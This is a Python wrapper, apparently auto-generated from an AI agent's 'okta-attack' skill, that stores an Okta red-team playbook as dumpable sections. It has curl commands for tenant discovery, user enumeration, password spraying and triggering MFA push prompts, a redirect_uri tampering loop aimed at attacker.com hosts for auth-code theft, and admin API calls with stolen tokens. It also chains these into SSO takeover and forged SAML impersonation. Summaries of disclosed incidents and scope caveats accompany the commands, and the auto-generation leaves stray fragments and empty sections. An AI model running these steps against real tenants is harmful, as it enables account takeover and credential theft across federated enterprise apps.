#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: claude-bughunter/okta-attack

Skill: Tenant subdomains often match the brand
Desc : Okta-as-IdP red-team attack chain — tenant discovery, user enumeration (multiple vectors), authentication flow analysis (factors enumeration, push-notification fatigue, SMS bypass), password spray with lockout discipline, Okta-specific phishing primitives (kits, FastPass abuse, OIDC redirect_uri tampering), MFA enumeration, post-compromise admin API surface. Many enterprise orgs use Okta instead of (or alongside) Entra ID. Distinct endpoints, distinct rate-limiting, distinct factor flows. Use when recon shows `<tenant>.okta.com`, `<tenant>.okta-emea.com`, `<tenant>.oktapreview.com`, or autodiscover-style records pointing at Okta IdP.

Run:  python claude-bughunter-okta-attack.py --help
      python claude-bughunter-okta-attack.py --list
      python claude-bughunter-okta-attack.py --dump <section>
"""
import sys, json, argparse

NAME = 'claude-bughunter/okta-attack'
TITLE = 'Tenant subdomains often match the brand'
DESCRIPTION = 'Okta-as-IdP red-team attack chain — tenant discovery, user enumeration (multiple vectors), authentication flow analysis (factors enumeration, push-notification fatigue, SMS bypass), password spray with lockout discipline, Okta-specific phishing primitives (kits, FastPass abuse, OIDC redirect_uri tampering), MFA enumeration, post-compromise admin API surface. Many enterprise orgs use Okta instead of (or alongside) Entra ID. Distinct endpoints, distinct rate-limiting, distinct factor flows. Use when recon shows `<tenant>.okta.com`, `<tenant>.okta-emea.com`, `<tenant>.oktapreview.com`, or autodiscover-style records pointing at Okta IdP.'

PAYLOADS = {
    'main': ["name: okta-attack", "description: Okta-as-IdP red-team attack chain \u2014 tenant discovery, user enumeration (multiple vectors), authentication flow analysis (factors enumeration, push-notification fatigue, SMS bypass), password spray with lockout discipline, Okta-specific phishing primitives (kits, FastPass abuse, OIDC redirect_uri tampering), MFA enumeration, post-compromise admin API surface. Many enterprise orgs use Okta instead of (or alongside) Entra ID. Distinct endpoints, distinct rate-limiting, distinct factor flows. Use when recon shows `<tenant>.okta.com`, `<tenant>.okta-emea.com`, `<tenant>.oktapreview.com`, or autodiscover-style records pointing at Okta IdP.", "sources: public-okta-docs, idp-redteam-knowledge, disclosed-incidents", "report_count: 8"],
    'when-to-use-this-skill': ["Trigger when:", "- DNS shows `<tenant>.okta.com` or `<tenant>.okta-emea.com` (EMEA region)", "- Login flow redirects to `<tenant>.okta.com/login` or `/app/<app_id>/sso/saml`", "- Web pages reference `/signin/customize`, `oktapreview.com`, or `auth-js-sdk`", "- Recon notes \"uses Okta for SSO\"", "- A target has `*.okta.com` SAN in TLS cert", "- Identity-fabric mapping returns Okta as IdP for a corporate app", "DO NOT use for:", "- Entra ID (use `m365-entra-attack` instead)", "- Google Workspace (use `google-workspace-attack` \u2014 not yet built)", "- ADFS (different protocol, on-prem)"],
    'tenant-discovery': [],
    'direct-guesses': ["```bash"],
    'tenant-subdomains-often-match-the-brand': [],
    'replace-these-with-your-target-s-actual-tenant-slug-candidates': ["for tenant in target-brand target-brand-ltd target-sister-brand target-brand-short target-other-variant; do", "for region in okta okta-emea oktapreview; do", "host=\"$tenant.$region.com\"", "code=$(curl -sk -o /dev/null -w \"%{http_code}\" --max-time 8 \"https://$host/\")", "[ \"$code\" != \"404\" ] && [ \"$code\" != \"000\" ] && echo \"  $host  $code\""],
    'cross-ref-from-dns': ["```bash"],
    'look-for-cname-records-pointing-to-okta': [],
    'replace-with-your-target-s-actual-domains': ["for domain in client.example client-ltd.example; do", "dig +short \"sso.$domain\" CNAME", "dig +short \"login.$domain\" CNAME", "dig +short \"auth.$domain\" CNAME", "dig +short \"okta.$domain\" CNAME"],
    'cross-ref-from-app-http-flow': ["```bash"],
    'visit-corporate-app-login-follow-redirects': ["curl -skL -o /dev/null -w \"%{redirect_url}\\n\" \"https://app.target.com/login\""],
    'if-redirects-to-something-okta-com-confirmed-okta-tenant': [],
    'user-enumeration': [],
    'method-1-api-v1-authn-differential': ["The auth API returns different errors for invalid users vs invalid passwords. Slightly differential.", "```bash"],
    'probe-single-user-don-t-spray-this-counts-as-auth-attempt': ["curl -sk -X POST \"https://<tenant>.okta.com/api/v1/authn\" \\", "-H \"Content-Type: application/json\" \\", "-d '{\"username\":\"<email>\",\"password\":\"_test_invalid_pw\"}'"],
    'response-codes': [],
    '401-errorcode-e0000004-invalid-credentials-user-exists-or-doesn-t-okta-unifies-these': [],
    '401-errorcode-e0000119-account-locked': [],
    '200-mfa-prompt-cred-valid-mfa-needed': [],
    '200-status-success-full-auth-rare-in-modern-setups': ["\u26a0 Okta has hardened against direct user-existence enum via `/api/v1/authn` \u2014 error message is typically uniform \"Authentication failed\". User enumeration via this endpoint is unreliable in 2024+."],
    'method-2-api-v1-users-me-factors-timing': ["Some flows expose user existence via response time differential. Less reliable than M365 OneDrive technique."],
    'method-3-sign-in-widget-js-endpoint': ["```bash", "curl -sk \"https://<tenant>.okta.com/api/v1/sessions/me\" \\", "-H \"Accept: application/json\""],
    'response-varies-by-tenant-config': [],
    'method-4-org-specific-identifier-probing': ["Some Okta orgs use email-as-username; others use `firstname.lastname` or employee-id. Test pattern guesses:", "firstname.lastname@target.com", "firstname_lastname@target.com", "flastname@target.com", "employeeID@target.com"],
    'method-5-oidc-v1-authorize-with-login-hint': ["```bash"],
    'tampering-with-login-hint-param-can-reveal-user-existence-on-some-configs': ["curl -skI \"https://<tenant>.okta.com/oauth2/v1/authorize?client_id=<id>&response_type=code&scope=openid&redirect_uri=https://example.com&login_hint=<email>\""],
    'different-redirect-user-exists-vs-doesn-t': [],
    'authentication-flow-analysis-always-do-this-first': ["```bash"],
    'initial-auth-observe-what-factors-come-back': ["curl -sk -X POST \"https://<tenant>.okta.com/api/v1/authn\" \\", "-H \"Content-Type: application/json\" \\", "-d '{\"username\":\"<valid_user>\",\"password\":\"_test_invalid_pw\"}' | python3 -m json.tool", "Response structure reveals factor configuration:", "```json", "\"stateToken\": \"00ABC...\",", "\"factorResult\": \"WAITING\",", "\"status\": \"MFA_REQUIRED\",", "\"_embedded\": {", "\"factors\": [", "{\"factorType\": \"push\", \"provider\": \"OKTA\"},", "{\"factorType\": \"token:software:totp\", \"provider\": \"OKTA\"},", "{\"factorType\": \"sms\", \"provider\": \"OKTA\"},", "{\"factorType\": \"call\", \"provider\": \"OKTA\"},", "{\"factorType\": \"email\", \"provider\": \"OKTA\"},", "{\"factorType\": \"question\", \"provider\": \"OKTA\"},", "{\"factorType\": \"webauthn\", \"provider\": \"FIDO\"}", "**Critical insight:** the factor list reveals which factors are available \u2014 phishing-resistance varies dramatically:", "- `webauthn` (FIDO2) \u2014 phishing-resistant", "- `question` (security questions) \u2014 extremely weak; KBA attacks", "- `sms` / `call` \u2014 phishing-able (push notification fatigue, SIM swap)", "- `push` \u2014 phishing-able via MFA fatigue", "- `email` \u2014 phishing-able if attacker has email read access", "- `totp` \u2014 phishing-able via AiTM"],
    'password-spray-with-okta-specific-lockout-discipline': [],
    'lockout-policy': ["Okta default: **10 failed sign-ins \u2192 lockout** (configurable per-org). Some orgs configure much stricter (3 fails).", "Discipline:", "- \u22642 attempts per user lifetime per engagement (safer than 1 in Entra because Okta lockout is sometimes 3 fails)", "- Track per-user in atomic state file", "- Stop on first valid hit OR if LOCKED rate exceeds threshold"],
    'spray-endpoint': ["```bash"],
    'same-api-v1-authn-see-authentication-flow-above': [],
    'status-codes-to-watch-for': [],
    'push-notification-fatigue-mfa-bombing': ["If a valid password is obtained and `push` factor is available, the classic attack: hammer the push factor until the user accepts out of fatigue.", "\u26a0 **OUT OF SCOPE in most red-team engagements** (counts as social engineering / phishing \u2014 e.g. phishing was explicitly OOS for authorized-engagement). Document the vector existence but do not execute without explicit sign-off."],
    'detection-only-check-does-target-allow-it': ["```bash"],
    'initiate-factor-verification': ["curl -sk -X POST \"https://<tenant>.okta.com/api/v1/authn/factors/<factor_id>/verify\" \\", "-H \"Content-Type: application/json\" \\", "-d '{\"stateToken\":\"<from_authn>\"}'"],
    'a-real-test-would-loop-this-don-t-do-that-without-explicit-ok': [],
    'oidc-redirect-uri-tampering': ["Okta OIDC apps often have a list of allowed `redirect_uri` values. Misconfigurations:", "```bash"],
    'get-the-app-s-authorize-endpoint': ["curl -sk \"https://<tenant>.okta.com/.well-known/openid-configuration\" | python3 -m json.tool"],
    'test-redirect-uri-injection': ["for ruri in \\", "\"https://attacker.example.com/\" \\", "\"https://target.com.attacker.com/\" \\", "\"https://target.com@attacker.com/\" \\", "\"https://target.com#@attacker.com/\" \\", "\"https://target.com\\\\@attacker.com/\" \\", "\"//attacker.com/\" \\", "\"https://target.com/cb?next=https://attacker.com/\"; do", "code=$(curl -sk -o /dev/null -w \"%{http_code}\" \\", "\"https://<tenant>.okta.com/oauth2/v1/authorize?client_id=<client>&response_type=code&scope=openid&redirect_uri=$(python3 -c \"import urllib.parse;print(urllib.parse.quote('$ruri'))\")\")", "echo \"  $ruri \u2192 $code\""],
    'any-302-with-the-attacker-url-in-location-header-open-redirect-auth-code-theft-chain': [],
    'saml-sp-misconfiguration-check-per-app': ["Each Okta SAML app has its own SP metadata:", "```bash"],
    'iterate-known-app-ids-find-via-the-org-s-app-list-usually-in-js-bundles-or-initial-login-redirects': ["curl -sk \"https://<tenant>.okta.com/app/<app_id>/sso/saml/metadata\""],
    'look-for': [],
    'authnrequestssigned-false-see-hunt-saml-for-xsw': [],
    'wantassertionssigned-false-assertion-replay-possible': [],
    'nameidformat-emailaddress-nameidformat': [],
    'okta-admin-api-post-cred-compromise': ["If a valid cred + MFA-completed token is obtained:", "```bash"],
    'get-session-token': ["curl -sk -X POST \"https://<tenant>.okta.com/api/v1/authn\" \\", "-d '{\"username\":\"...\",\"password\":\"...\"}'"],
    'if-success-response-has-sessiontoken': [],
    'exchange-for-api-token-admin-only': [],
    'test-admin-endpoints-all-require-valid-ssws-token': ["curl -sk -H \"Authorization: SSWS <token>\" \"https://<tenant>.okta.com/api/v1/users\"", "curl -sk -H \"Authorization: SSWS <token>\" \"https://<tenant>.okta.com/api/v1/groups\"", "curl -sk -H \"Authorization: SSWS <token>\" \"https://<tenant>.okta.com/api/v1/apps\"", "curl -sk -H \"Authorization: SSWS <token>\" \"https://<tenant>.okta.com/api/v1/logs\"      # audit log"],
    'okta-specific-phishing-kits-informational-oos-for-non-phishing-engagements': ["- **EvilProxy** \u2014 Okta-aware AiTM kit", "- **Modlishka** \u2014 generic AiTM", "- **Evilginx2** \u2014 has Okta phishlets", "Document existence; do not deploy without explicit phishing scope."],
    'fastpass-okta-verify-abuse': ["Okta FastPass is push-based + device-bound. Bypasses:", "- Device trust spoofing (requires kit + endpoint compromise \u2014 internal-only)", "- Push fatigue (see above)", "- Phishing redirect to fake FastPass prompt"],
    'common-okta-tenant-configuration-patterns': [],
    'tooling': ["- **`OktaTerrify`** (github.com/silverhack/OktaTerrify) \u2014 post-compromise Okta device-trust / FastPass enumeration. The only verifiable public Okta-specific offensive tool; no other named, maintained \"okta-attacker\"/\"okta-toolkit\" utility is verifiable \u2014 build engagement-specific scripts against `/api/v1/*` instead of citing unverified tool names."],
    'anti-patterns': ["- **DO NOT use Entra-style spray pace on Okta** \u2014 Okta's anti-automation is tuner-different; rate-limit hits faster", "- **DO NOT skip factor enumeration** \u2014 knowing the factor list before attempting spray informs the realistic threat model", "- **DO NOT assume MFA-fatigue is in scope** \u2014 it's social engineering; explicit OK required", "- **DO NOT confuse `*.oktapreview.com` with production** \u2014 preview is a non-prod tenant, findings have different severity"],
    'bridge-to-neighboring-skills': ["- `m365-entra-attack` \u2014 sibling skill for the M365 case; identical mental model", "- `hunt-oauth` \u2014 OIDC redirect_uri tampering, state attack, PKCE bypass", "- `hunt-saml` \u2014 XSW / signature-stripping for per-app SAML SP", "- `hunt-mfa-bypass` \u2014 push fatigue, OTP brute, replay", "- `mid-engagement-ir-detection` \u2014 Okta SOC dashboards are sensitive; expect mitigations during testing"],
    'anti-pattern-okta-user-enumeration-in-2024': ["Several techniques publicly documented through 2022 (e.g., `/api/v1/authn` differential errors) have been hardened. Don't rely on stale knowledge \u2014 confirm enumeration vector freshness on each engagement by:", "1. Testing 1 known-existing username (e.g. `info@<domain>` if reachable)", "2. Testing 1 known-not-existing username", "3. Comparing responses byte-by-byte and timing", "If responses are identical, the vector is hardened \u2014 pivot to OneDrive-equivalent or different approach."],
    'disclosed-cases-cves-coordinated-disclosure-writeups': ["These are the canonical public references that justify the techniques in this skill. Cite them in reports when applicable and use them as analog cases when scoping novel Okta attack chains."],
    '1-okta-sitel-sykes-lapsus-supply-chain-breach-jan-2022-disclosed-mar-2022': ["- Refs: <https://sec.okta.com/articles/2022/03/official-okta-statement-lapsus-claims/>, <https://www.okta.com/blog/company-and-culture/oktas-investigation-of-the-january-2022-compromise/>, <https://thehackernews.com/2022/03/new-report-on-okta-hack-reveals-entire.html>, <https://www.itpro.com/security/cyber-security/367236/leaked-mandiant-report-okta-breach-lapsus-operation>", "- Flow: LAPSUS$ compromised a support engineer's workstation at Sitel (third-party support sub-processor, acquired Sykes Enterprises). Via Mimikatz + GitHub-hosted tooling on a thin-client jump host, they reached Okta's internal \"SuperUser\" support tooling for ~25 minutes on Jan 21 2022. Final scope: 2 customer tenants accessed of 366 originally feared.", "- Root cause: Third-party support provider with persistent privileged access to customer tenants, weak segmentation, domain creds stored in spreadsheets, no MFA on the inbound VPN account, delayed reporting (Mandiant report Mar 17, public disclosure Mar 22 only after LAPSUS$ tweeted screenshots).", "- Year: 2022. Severity: Critical (industry-shaking \u2014 reset the trust model for IdP supply chains)."],
    '2-okta-customer-support-har-file-leak-sep-oct-2023': ["- Refs: <https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause/>, <https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/>, <https://www.beyondtrust.com/blog/entry/okta-support-unit-breach>, <https://www.bleepingcomputer.com/news/security/okta-breach-134-customers-exposed-in-october-support-system-hack/>", "- Flow: Okta support employee logged into a personal Google profile on a corp laptop; Chrome sync exfiltrated saved support-service-account creds to a compromised personal device. Threat actor used those creds to log into the support case-management portal Sep 28 - Oct 17 2023, downloaded HAR files that customers had uploaded for troubleshooting. HAR files contained live session cookies/tokens \u2192 session-replay against the customers' Okta tenants. 134 customers exposed, 5 had sessions hijacked (BeyondTrust, Cloudflare, 1Password publicly disclosed).", "- Root cause: Service-account creds reaching an unmanaged personal device via Chrome profile sync + HAR files containing un-sanitized session tokens accepted for replay (no IP/device binding on support tokens).", "- Year: 2023. Severity: Critical. BeyondTrust detected and reported to Okta on Oct 2 2023; Okta did not publicly acknowledge until Oct 19 2023."],
    '3-scattered-spider-octo-tempest-unc3944-okta-tenant-social-engineering-campaign-2022-2024-ongoing': ["- Refs: <https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a>, <https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection/>, <https://www.darkreading.com/cyberattacks-data-breaches/how-the-okta-cross-tenant-impersonation-attacks-succeeded>, <https://attack.mitre.org/groups/G1015/>", "- Flow: Group calls IT help desk impersonating an employee (LinkedIn-profile-sourced identity), requests MFA reset + password reset, gains initial Okta foothold. Then elevates to Okta Super-Admin, configures a second IdP under attacker control, enables inbound federation + account-linking, modifies NameID on attacker-IdP to match the target user, and impersonates any Okta user across the tenant without their cred. Used in MGM and Caesars attacks (Sep 2023, $100M+ losses) and confirmed on 4+ Okta customers in the Jul-Aug 2023 campaign.", "- Root cause: Help-desk-as-trust-anchor with no out-of-band verification + Okta inbound federation feature allowing attacker-controlled IdP to issue arbitrary-NameID assertions accepted as authentic.", "- Year: 2023 onwards. Severity: Critical. Joint CISA/FBI advisory AA23-320A."],
    '4-okta-cross-origin-authentication-credential-stuffing-apr-may-2024': ["- Refs: <https://sec.okta.com/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks/>, <https://thehackernews.com/2024/05/okta-warns-of-credential-stuffing.html>, <https://arcticwolf.com/resources/blog/okta-cross-origin-authentication-feature-customer-identity-cloud-targeted-credential-stuffing-attacks/>", "- Flow: Customer Identity Cloud (Auth0-derived) cross-origin auth endpoint silently accepted credential-stuffing from unregistered origins. Observed Apr 15 - May 2024. Tenant log signals: `fcoa` (failed cross-origin auth), `scoa` (successful cross-origin auth), `pwd_leak` (breached password match).", "- Root cause: Cross-origin auth permitted on all tenants by default with no origin allowlist enforced at the auth-API edge; credential-stuffing throttling applied per-endpoint not per-tenant.", "- Year: 2024. Severity: High (mass-scale ATO via reused creds)."],
    '5-cve-2024-0981-okta-ad-ldap-delauth-bcrypt-cache-key-auth-bypass-oct-2024': ["- Refs: <https://trust.okta.com/security-advisories/okta-ad-ldap-delegated-authentication-username/>, <https://www.theregister.com/2024/11/04/why_the_long_name_okta/>, <https://www.nodejs-security.com/blog/okta-bcrypt-security-incident-bun-nodejs>", "- Flow: Okta cached AD/LDAP DelAuth results keyed by `bcrypt(userId + username + password)`. Bcrypt silently truncates input at 72 bytes. When username length \u2265 52 chars, the password bytes fall past the 72-byte boundary \u2192 cache key collapses to be password-independent. If the user had a prior successful login (cache populated) AND the AD/LDAP agent was unreachable AND MFA was disabled \u2192 any password authenticated.", "- Root cause: Using bcrypt as a general-purpose hash without accounting for the algorithm's 72-byte input limit + cache fallback path inverted the security model (cache trusted over live auth).", "- Year: 2024. Severity: High. Bug introduced Jul 23 2024, internally found and fixed Oct 30 2024 (~3 months exposure window)."],
    '6-okta-verify-ios-push-response-bypass-cve-2024-10327-disclosed-oct-2024': ["- Refs: <https://trust.okta.com/security-advisories/okta-verify-for-ios-cve-2024-10327/>", "- Flow: Okta Verify iOS 9.25.1-beta / 9.27.0 had a bug in the iOS ContextExtension push-action handler. From the lock screen long-press / drag-down banner / Apple Watch reply path, both the \"Yes, it's me\" and \"No, it's not me\" buttons returned the same accept-auth response. A push-fatigued user who explicitly tapped \"No\" still approved the auth.", "- Root cause: Two notification-response action handlers wired to the same backend confirmation path \u2014 UX-level Deny did not propagate as a backend rejection.", "- Year: 2024. Severity: High (silently defeats the user's last line of defence against push fatigue / Scattered-Spider-style push bombing)."],
    '7-varonis-threat-labs-crosstalk-secret-agent-okta-abuse-jan-2023': ["- Refs: <https://www.varonis.com/blog/okta-attack-vectors>", "- Flow: (a) CrossTalk: any Okta tenant admin (incl. free-developer tenant) could issue SMS / email templates that delivered to *any* email/phone \u2014 sent via legitimate Okta mailer infrastructure (passes SPF/DKIM/DMARC for okta.com). Used to stage cross-tenant phishing that arrives from a trusted sender. (b) Secret Agent: the SSWS token stored on the on-prem Okta AD-agent sync server was decryptable from disk; possessor could register a rogue AD agent that intercepted DelAuth plaintext credentials for the entire org.", "- Root cause: (a) Tenant-bounded sender identity not enforced on outbound notification API. (b) Agent SSWS bootstrap-secret stored recoverable on disk; new-agent enrollment did not require admin co-signature.", "- Year: 2023. Severity: High for both. Disclosed and patched by Okta."],
    '8-okta-admin-console-session-cookie-theft-via-stealer-malware-2022-2024-ongoing-class': ["- Refs: <https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection/>, <https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a>, <https://www.beyondtrust.com/blog/entry/okta-support-unit-breach>", "- Flow: Class of attack \u2014 stealer malware (Lumma, RedLine, Raccoon, StealC) on a corp endpoint exfiltrates `sid` cookie from `<tenant>.okta.com` and `<tenant>-admin.okta.com`. Without IP-binding or device-binding on the Okta session, the attacker replays the cookie from a residential proxy and obtains the user's full session (incl. admin if the victim was an admin) \u2014 bypasses MFA entirely (already-MFA-completed session). Underpinned both the Oct 2023 HAR-file incident and most Scattered Spider intrusions.", "- Root cause: Okta session cookies (until DPoP / Device Bound Session Cookies / asymmetric session keys are enforced) are bearer tokens \u2014 anyone holding the cookie is the user.", "- Year: 2022-2024 (ongoing class). Severity: Critical when admin sessions stolen."],
    'take-aways-for-hunters': ["- The 2022 LAPSUS$, 2023 HAR-file, and 2023 Scattered Spider campaigns share a pattern: **the attack rarely hits Okta's product code \u2014 it hits the trust relationships around Okta** (third-party support, help-desk verification, customer-uploaded artifacts, federated IdPs). Recon should map these trust edges first.", "- CVE-2024-0981 (bcrypt 72-byte truncation) is the rare pure-product Okta CVE \u2014 most disclosed Okta bugs are configuration or operational.", "- Push fatigue is not just social engineering \u2014 the Okta Verify iOS bug shows the platform itself can silently approve a denied push. Treat any Okta push factor as bypassable in 2024+.", "- For red-team scoping: HAR-file replay, inbound-federation IdP injection, and stealer-cookie replay are the three highest-yield post-recon primitives observed in the wild."],
    'related-skills-chains': ["- **`hunt-subdomain`** \u2014 Okta tenant naming patterns (`<org>.okta.com`, `<org>.oktapreview.com`, `<org>-admin.okta.com`) frequently include orphan/dev tenants. Chain primitive: Okta tenant discovery via `/.well-known/okta-organization` \u2192 enumerate `<org>-dev`, `<org>-uat`, `<org>-test` subdomains \u2192 `hunt-subdomain` orphan-tenant identification \u2192 claim abandoned tenant \u2192 SSO takeover (legitimate `<org>` users redirected through compromised IdP for any app federated to the dev tenant).", "- **`m365-entra-attack`** \u2014 Okta-as-IdP for M365 is common in hybrid orgs. Chain primitive: `okta-attack` user enumeration + spray succeeds on Okta tenant \u2192 Okta is federated to Entra \u2192 SAML assertion issued by compromised Okta user \u2192 full M365 access without ever touching `login.microsoftonline.com` directly (bypasses Entra Conditional Access in many configurations).", "- **`hunt-saml`** \u2014 Okta issues SAML assertions to every federated downstream app. Chain primitive: Okta admin or developer credential captured \u2192 mint arbitrary SAML assertions in Okta admin \u2192 `hunt-saml` XSW or signature manipulation not even needed \u2014 legitimately signed assertions for arbitrary impersonation across every federated app (Salesforce, Workday, AWS, GitHub, M365).", "- **`hunt-mfa-bypass`** \u2014 Okta supports multiple factors with varying enforcement. Chain primitive: Okta password sprayed \u2192 MFA challenge \u2192 `hunt-mfa-bypass` factor-downgrade (push-fatigue, SMS fallback, voice fallback, security-question fallback) \u2192 bypass to authenticated session.", "- **`triage-validation`** \u2014 Okta findings can be high-impact but need the 7-Question Gate run on whether the captured artifact (token, code, factor) actually grants meaningful access. Chain primitive: validated Okta primitive \u2192 `triage-validation` to confirm access plane \u2192 `redteam-report-template` with explicit federated-app blast-radius."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()